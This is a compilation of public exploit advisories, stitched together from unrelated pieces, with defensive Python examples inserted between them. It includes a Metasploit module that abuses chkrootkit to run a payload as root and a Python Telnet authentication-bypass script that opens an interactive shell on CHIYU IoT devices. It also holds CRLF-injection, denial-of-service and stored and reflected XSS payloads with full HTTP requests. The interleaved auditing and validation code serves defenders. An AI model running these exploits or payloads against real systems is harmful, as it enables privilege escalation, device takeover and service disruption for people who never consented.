# Exploit Title: Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path
# Exploit Author: Laguin Benjamin (MONK-MODE)
# Discovery Date: 2023-19-01
# Vendor Homepage: https://personifyinc.com/
# Software Link: https://personifyinc.com/download/chromacam
# Tested Version: Chromacam-4.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 x64
# CVE: In progress
# Steps to discover the Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Personify Frame Transformer  PsyFrameGrabberService  C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe  Auto
C:\>sc qc "PsyFrameGrabberService"
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: PsyFrameGrabberService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Personify Frame Transformer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-1000
OS Name: Microsoft Windows 10 Professionnel
OS Version: 10.0.19044 N/A build 19044
# Exploit
If an attacker has already compromised the system and the current user has write permission on "C:\", "C:\Program Files (x86)\", "C:\Program Files (x86)\Personify", "C:\Program Files (x86)\Personify\ChromaCam" or "C:\Program Files (x86)\Personify\ChromaCam\64", they could place their own "Program.exe" or "PsyFrameGrabberService.exe" in the corresponding folder, and when the service starts it would launch that file rather than the original "PsyFrameGrabberService.exe".
The service starts automatically at boot and runs as LocalSystem.
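The check a defender runs over `sc qc` output, as an added example (not part of the advisory and not Personify's code): it extracts BINARY_PATH_NAME, flags an unquoted path that contains spaces, and lists the alternative file names CreateProcess would try before the real image, which are exactly the locations whose parent directories must not be writable by standard users and whose creation should be watched by file-integrity monitoring. The sample input is the advisory's own `sc qc` listing re-joined onto single lines; the helper names are the example's own.

```python
import re
from typing import List

# Constructed sample: the `sc qc` listing quoted in the advisory above, with the
# BINARY_PATH_NAME value re-joined onto one line.
SAMPLE_SC_QC = """\
SERVICE_NAME: PsyFrameGrabberService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Personify\\ChromaCam\\64\\PsyFrameGrabberService.exe
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(output: str) -> str:
    """Pull the raw BINARY_PATH_NAME value out of `sc qc` output."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", output)
    if not m:
        raise ValueError("no BINARY_PATH_NAME line found")
    return m.group(1).strip()


def image_path(binary_path: str) -> str:
    """Return the executable part of a service command line.

    A quoted command line yields the quoted token; an unquoted one is cut at
    the first '.exe' so that any trailing arguments are dropped.
    """
    p = binary_path.strip()
    if p.startswith('"'):
        return p[1:p.index('"', 1)]
    m = re.match(r"(.+?\.exe)", p, re.IGNORECASE)
    return m.group(1) if m else p


def is_unquoted_service_path(binary_path: str) -> bool:
    """True when the path is not quoted and contains a space: the condition
    under which the service control manager may resolve the wrong file."""
    p = binary_path.strip()
    return not p.startswith('"') and " " in image_path(p)


def search_candidates(binary_path: str) -> List[str]:
    """Files Windows would try, in order, for an unquoted path: every prefix
    that ends at a space with '.exe' appended, then the full path.

    For a defender these are the locations to check: none of their parent
    directories may be writable by standard users, and their creation is
    worth an alert in file-integrity monitoring.
    """
    exe = image_path(binary_path)
    if not is_unquoted_service_path(binary_path):
        return [exe]
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates


def audit_sc_qc(output: str) -> dict:
    """Summarise one `sc qc` listing: image path, whether it is unquoted, the
    candidate files, and the account the service runs as."""
    path = binary_path_from_sc_qc(output)
    runs_as = re.search(r"SERVICE_START_NAME\s*:\s*(.+)", output)
    return {
        "image": image_path(path),
        "unquoted": is_unquoted_service_path(path),
        "candidates": search_candidates(path),
        "account": runs_as.group(1).strip() if runs_as else "",
    }


if __name__ == "__main__":
    for key, value in audit_sc_qc(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```

Run against real hosts, the `audit_sc_qc` input would come from `sc qc <name>` for every AUTO_START service; the fix on the vendor side is simply to register the service with a quoted BINARY_PATH_NAME, and on the operator side to confirm that standard users have no write access to any directory on the candidate list.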
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chkrootkit Local Privilege Escalation',
      'Description'    => %q{
        Chkrootkit before 0.50 will run any executable file named
        /tmp/update as root, allowing a trivial privesc.

        WfsDelay is set to 24h, since this is how often a chkrootkit
        scan is scheduled by default.
      },
      'Author'         => [
        'Thomas Stangner',         # Original exploit
        'Julien "jvoisin" Voisin'  # Metasploit module
      ],
      'References'     => [
        ['CVE', '2014-0476'],
        ['OSVDB', '107710'],
        ['EDB', '33899'],
        ['BID', '67813'],
        ['CWE', '20'],
        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
      ],
      'DisclosureDate' => 'Jun 04 2014',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Privileged'     => true,
      'Stance'         => Msf::Exploit::Stance::Passive,
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
    ))

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')
    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')
    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end
end
# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection
# Date: May 31 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions < June 2021
# Tested on: BF-430, BF-431, and BF-450M
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.
CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
Affected parameter: redirect=
Component: all the CGI components
Payload: %0d%0a%0d%0a<script>alert(document.domain)</script>
====HTTP request======
GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
======HTTP response========
HTTP/1.1 302 Found
Location: setting.htm

<script>alert(document.domain)</script>
Content-Length: 0
Content-Type: text/html
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to all CGI components
3. Append the payload at the end of the vulnerable parameter (redirect )
4. Submit the request and observe payload execution
Mitigation: The latest version of the CHIYU firmware should be installed
to mitigate this vulnerability.
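What the response above shows, reproduced and then corrected, as an added example that is not CHIYU's firmware code: a handler that copies `redirect=` into the Location header unchecked lets the decoded CR/LF pair end the header block, so the rest of the parameter becomes the response body (which is why Content-Length and Content-Type appear after the script in the captured response). The hardened version rejects control characters and only redirects to pages from an allowlist; the allowlist and helper names are assumptions for the example.

```python
from urllib.parse import unquote

# Constructed sample: the redirect= value from the request quoted above, decoded
# the way the CGI handler would see it.
INJECTED_TARGET = unquote("setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>")

# Assumed allowlist of pages the CGI may redirect to; the real firmware's set is unknown.
ALLOWED_REDIRECTS = {"setting.htm", "fail.htm", "manage.htm"}


def build_redirect_vulnerable(target: str) -> bytes:
    """Mirror of the flaw: the parameter is copied into Location unchecked,
    so a CR/LF pair inside it terminates the header block early."""
    return (b"HTTP/1.1 302 Found\r\nLocation: " + target.encode("latin-1")
            + b"\r\nContent-Length: 0\r\nContent-Type: text/html\r\n\r\n")


def validate_redirect(target: str) -> str:
    """Hardened check: no control characters, and only a known local page."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        raise ValueError("control character in redirect target")
    if target not in ALLOWED_REDIRECTS:
        raise ValueError("redirect target not in allowlist")
    return target


def build_redirect_safe(target: str) -> bytes:
    return (b"HTTP/1.1 302 Found\r\nLocation: " + validate_redirect(target).encode("ascii")
            + b"\r\nContent-Length: 0\r\nContent-Type: text/html\r\n\r\n")


def redirect_is_accepted(target: str) -> bool:
    try:
        validate_redirect(target)
        return True
    except ValueError:
        return False


def split_response(raw: bytes):
    """Parse a raw response the way a client would: status line, header
    lines, and whatever follows the first blank line as the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    return lines[0], lines[1:], body


def has_header_injection(param_value: str) -> bool:
    """Log-review helper: a redirect parameter should never contain CR or LF
    after URL-decoding."""
    decoded = unquote(param_value)
    return "\r" in decoded or "\n" in decoded


if __name__ == "__main__":
    status, headers, body = split_response(build_redirect_vulnerable(INJECTED_TARGET))
    print("vulnerable handler: headers =", headers, "body =", body[:40])
    print("hardened handler accepts injected value:", redirect_is_accepted(INJECTED_TARGET))
```

`has_header_injection` is the cheap check to run over access logs: any `redirect=` value that decodes to a CR or LF is an attempt, whether or not it succeeded.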
# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
# CVE: CVE-2021-31642
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, BF-630, BF-631, and SEMAC. The vulnerability can be exploited by sending an unexpected integer (> 32 bits) in the page parameter, which crashes the web portal and leaves it unavailable until the device is rebooted.
CVE ID: CVE-2021-31642
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642
Affected parameter: page=
Component: if.cgi
Payload:
if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
====HTTP request======
GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to the CGI component (if.cgi)
3. Append the payload at the end of the vulnerable parameter (page)
4. Submit the request and observe payload execution
Mitigation: The latest version of the CHIYU firmware should be installed
to mitigate this vulnerability.
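The input-validation side of this class of bug, as an added example (not the device's code): a `page=` value should be parsed as a bounded decimal and range-checked against the pages that exist before it is ever used in arithmetic. The `to_int32` helper only illustrates, as an assumption about the general failure mode rather than a claim about this firmware, how an unchecked value wraps once a product exceeds 32 bits; the other helper names are the example's own.

```python
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def to_int32(value: int) -> int:
    """Emulate what happens when an arbitrary integer is stored in a C `int`:
    the value is truncated to 32 bits and re-interpreted as signed."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def parse_page_param(raw: str, total_pages: int) -> int:
    """Validated parser for a ?page= value: decimal digits only, a length cap
    that rules out absurdly large numbers before int() is called, and a range
    check against the number of pages that actually exist."""
    if not raw.isdigit() or len(raw) > 9:
        raise ValueError("page must be a decimal number of at most 9 digits")
    page = int(raw)
    if not 1 <= page <= total_pages:
        raise ValueError(f"page {page} outside 1..{total_pages}")
    return page


def page_accepted(raw: str, total_pages: int) -> bool:
    try:
        parse_page_param(raw, total_pages)
        return True
    except ValueError:
        return False


def log_offset_unchecked(page: int, entries_per_page: int) -> int:
    """Assumed illustration of the failure mode (not the device's real code):
    an unchecked page number multiplied by a block size wraps once the
    product exceeds 32 bits, yielding a negative or meaningless offset."""
    return to_int32(page * entries_per_page)


def log_offset_checked(raw: str, total_pages: int, entries_per_page: int) -> int:
    """The same computation behind the validated parser, with an explicit
    guard that the result still fits the integer type it will be stored in."""
    offset = parse_page_param(raw, total_pages) * entries_per_page
    if offset > INT32_MAX:
        raise OverflowError("offset does not fit in 32 bits")
    return offset


if __name__ == "__main__":
    print("unchecked offset for page=2781000, 1024 bytes/page:", log_offset_unchecked(2781000, 1024))
    print("page=2781000 accepted with 500 pages:", page_accepted("2781000", 500))
```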
# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, and SEMAC
# CVE: CVE-2021-31251
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
"""
Description: Several IoT devices from the CHIYU Technology firm are
vulnerable to a flaw that permits bypassing the telnet authentication
process due to an overflow during the negotiation of the telnet protocol.
Telnet authentication is bypassed by supplying a specially malformed
request, and an attacker may force the remote telnet server to believe that
the user has already authenticated. Several models are vulnerable,
including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware
versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""
#!/usr/bin/env python3
# usage: python3 exploit.py IP
import socket
import time
import sys

HOST = sys.argv[1]
PORT = 23
socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect_ex((HOST, PORT))
    try:
        print("[+] Try to connect...\n")
        time.sleep(1)
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        result = s.recv(1024).strip()
        if result != b'\xff\xfe\x01':
            s.send(b"\x09")
            result = s.recv(1024).strip()
        if connect == 0 and "sername" not in str(result):
            if b"\xff\xfe\x01" == result:
                print("Connected! ;)\ntype: \"help\"\n\n")
                while 1:
                    cmd = input("(CHIYU pwnShell:) $ ")
                    body = cmd + "\n"
                    s.send(body.encode('utf-8', 'ignore'))
                    result = s.recv(1024).decode('utf8', 'ignore')
                    if not len(result):
                        print("[+] CHIYU device not available, try again ... (terminating)")
                        s.close()
                        break
                    print(result.strip('CMD>'))
                    b = "\n"
                    s.send(b.encode('utf-8', 'ignore'))
                    result = s.recv(1024).decode()
                    print(result.strip('CMD>'))
    except KeyboardInterrupt:
        print("\n[+] ^C Received, closing connection")
        s.close()
    except EOFError:
        print("\n[+] ^D Received, closing connection")
        s.close()
except socket.error:
    print("[+] Unable to connect to CHIYU device.")
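For anyone reviewing a packet capture of this exchange, the raw bytes in the script above are standard Telnet option negotiation (RFC 854/855): `\xff\xfb\x01` is IAC WILL ECHO, `\xff\xfb\x03` is IAC WILL SUPPRESS-GO-AHEAD, `\xff\xfd\x18` is IAC DO TERMINAL-TYPE, and the reply the script tests for, `\xff\xfe\x01`, is IAC DONT ECHO. The decoder below is an added example, not part of the advisory, and the summary function is a simple heuristic of my own for flagging a client that repeats identical negotiation bursts and sends control bytes before any printable text, which is what the exchange above looks like on the wire. The sample chunks are constructed from the script's own byte strings.

```python
from typing import List, Tuple

IAC = 0xFF
COMMANDS = {0xFB: "WILL", 0xFC: "WONT", 0xFD: "DO", 0xFE: "DONT"}
# Option codes from the Telnet option registry (RFC 857, 858, 1091).
OPTIONS = {0x01: "ECHO", 0x03: "SUPPRESS-GO-AHEAD", 0x18: "TERMINAL-TYPE"}

# Constructed sample: the client bytes the script above sends, and the
# server reply it tests for.
CLIENT_BURST = b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18"
SERVER_REPLY = b"\xff\xfe\x01"


def decode_negotiation(data: bytes) -> List[Tuple[str, str]]:
    """Decode IAC <command> <option> triples into (command, option) pairs;
    bytes outside a complete triple are reported as DATA with their hex value."""
    out: List[Tuple[str, str]] = []
    i = 0
    while i < len(data):
        if data[i] == IAC and i + 2 < len(data) and data[i + 1] in COMMANDS:
            option = OPTIONS.get(data[i + 2], f"OPT-{data[i + 2]}")
            out.append((COMMANDS[data[i + 1]], option))
            i += 3
        else:
            out.append(("DATA", f"0x{data[i]:02x}"))
            i += 1
    return out


def negotiation_summary(chunks: List[bytes]) -> dict:
    """Summarise a client->server stream captured as a list of send() chunks:
    how many negotiation triples were sent, how many chunks exactly repeated
    an earlier negotiation burst, and whether a control character was sent
    before any printable text (a normal login sends a username first)."""
    seen = set()
    triples = 0
    repeats = 0
    text_seen = False
    control_before_text = False
    for chunk in chunks:
        decoded = decode_negotiation(chunk)
        if decoded and all(cmd != "DATA" for cmd, _ in decoded):
            triples += len(decoded)
            if chunk in seen:
                repeats += 1
            seen.add(chunk)
            continue
        for cmd, value in decoded:
            if cmd != "DATA":
                continue
            byte = int(value, 16)
            if byte >= 0x20:
                text_seen = True
            elif not text_seen:
                control_before_text = True
    return {"triples": triples, "repeated_bursts": repeats,
            "control_before_text": control_before_text}


if __name__ == "__main__":
    print(decode_negotiation(CLIENT_BURST))
    print(decode_negotiation(SERVER_REPLY))
    print(negotiation_summary([CLIENT_BURST, CLIENT_BURST, CLIENT_BURST, b"\x09", b"help\n"]))
```

The practical mitigation for devices like these is not a detection rule but removing the exposure: disable the Telnet service where the firmware allows it, and otherwise keep TCP/23 unreachable from any network an attacker could be on.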
# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
# Date: May 31 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
CVE ID: CVE-2021-31250
CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
============= PoC 01 ===============
Affected parameter: TF_submask
Component: if.cgi
Payload: "><script>alert(123)</script>
HTTP Request:
GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/ap_tcps.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_submask)
4. Submit the request and observe payload execution
============= PoC 02 ===============
Affected parameter: TF_hostname=
Component: dhcpc.cgi
Payload: /"><img src="#">
HTTP Request:
GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/wan_dc.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (dhcpc.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_hostname)
4. Submit the request and observe payload execution
============= PoC 03 ===============
Affected parameter: TF_servicename=
Component: ppp.cgi
Payload: "><script>alert(123)</script>
HTTP Request:
GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (ppp.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_servicename)
4. Submit the request and observe payload execution
============= PoC 04 ===============
Affected parameter: TF_port=
Component: man.cgi
Payload: /"><img src="#">
HTTP Request:
GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (man.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_port)
4. Submit the request and observe payload execution
#2: Unauthenticated XSS in several CHIYU IoT devices
CVE ID: CVE-2021-31641
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641
Component: any argument passed via URL that results in an HTTP 404
Payload: http://ip/<script>alert(123)</script>
Steps to reproduce:
1. Navigate to the webpage of the vulnerable device
2. In the web browser, append the payload after the IP address (see payload above)
3. Submit the request and observe payload execution
#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
CVE ID: CVE-2021-31643
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643
Affected parameter: username=
Component: if.cgi
Payload: "><script>alert(1)</script>
HTTP request - SEMAC Web Ver7.2
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=; remote=00000000
Upgrade-Insecure-Requests: 1
HTTP request - BIOSENSE-III-COMBO(M1)(20000)
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (username)
4. Submit the request and observe payload execution
# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839
# 1. Description:
# In the CHIYU BF430 web page, a user can modify the system configuration by accessing /if.cgi.
# Attackers can inject malicious XSS code in the "TF_submask" field.
# The XSS code is stored in the database, which causes a stored XSS vulnerability.
# 2. Proof of Concept:
# Access the /if.cgi of the CHIYU BF430 232/485 TCP/IP Converter.
# Inject the XSS code in the parameter "TF_submask":
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
